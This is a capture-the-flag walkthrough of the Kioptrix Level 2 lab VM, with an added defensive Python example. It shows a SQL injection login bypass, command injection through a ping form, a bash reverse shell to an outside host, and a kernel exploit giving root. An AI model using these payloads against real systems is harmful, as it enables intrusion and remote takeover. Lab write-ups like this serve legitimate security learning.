kioptrix level 2

March 14, 2015

Kioptrix 2 is the second VM in the Kioptrix series by @loneferret. You can download it from VulnHub or the Kioptrix website.

As usual I first started off with an nmap scan of the box:

root@kali:~# nmap -Pn -n 10.1.1.33

Nmap scan report for 10.1.1.33
Host is up (0.0051s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

My first step after seeing port 80 open was to open a web browser and browse to it.

[screenshot: kioptrix login]

After a bit of trial and error I found that the login page is vulnerable to SQL injection, so I entered admin as the username and ' or '1'='1' -- (note the trailing space after the --) as the password and…

[screenshot: kioptrix logged in]

Once logged in I was presented with a page that allowed me to ping other machines on the network. To break out of the ping command I tried appending a ; and a second command after the host, 127.0.0.1; ls -lah, which returned a directory listing along with the ping output.

127.0.0.1; ls -lah
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.056 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.028/0.038/0.056/0.012 ms, pipe 2
total 24K
drwxr-xr-x  2 root root 4.0K Oct  8  2009 .
drwxr-xr-x  8 root root 4.0K Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1.7K Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
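
From the defender's side, the two bugs above (the login bypass and the ; injection in the ping form) both come down to user input reaching an SQL statement and a shell unescaped. The following Python is an added example, not code from the original post or the Kioptrix VM (whose form is PHP): it assumes a hypothetical ping form and a constructed login table, validates the target strictly and passes it as a single argv element with no shell, and binds the login fields as query parameters.

```python
import ipaddress
import re
import sqlite3
from typing import List, Optional

# Hostname labels per RFC 1123: letters, digits and hyphens, not starting
# or ending with a hyphen, joined by dots.
_HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def validate_ping_target(user_input: str) -> Optional[str]:
    """Return the target if it is a bare IP address or hostname, else None.
    Spaces, ';', '&', '|' and anything else that is not part of a host
    never get through, so '127.0.0.1; ls -lah' is rejected outright."""
    target = user_input.strip()
    if not target or len(target) > 253:
        return None
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    return target if _HOSTNAME_RE.fullmatch(target) else None


def build_ping_argv(user_input: str) -> Optional[List[str]]:
    """argv for subprocess.run(argv) with no shell: the target is one
    argument, so it cannot start a second command however it is written.
    '--' ends option parsing so the target can never be read as a flag."""
    target = validate_ping_target(user_input)
    if target is None:
        return None
    return ["ping", "-c", "3", "--", target]


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory user table for this demo (not the VM's schema).
    The password is stored in clear only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "demo-password"))
    return conn


def login_ok(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: the submitted text is bound as data, so
    ' or '1'='1' -- stays a literal string and cannot rewrite the WHERE."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None
```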

This enabled me to run any commands I liked on the remote machine, so I sent myself back a shell by setting up a listener on my box with nc -lvp 8080 and then executing 127.0.0.1; bash -i >& /dev/tcp/192.168.1.116/8080 0>&1 from the webpage.

bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

With this kernel version in hand and after a bit more prodding around on the remote machine I found a matching kernel exploit, downloaded it to the remote box using wget, compiled it, then ran it, which returned a root shell.

bash-3.00$ gcc -o root root.c
bash-3.00$ ./root
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
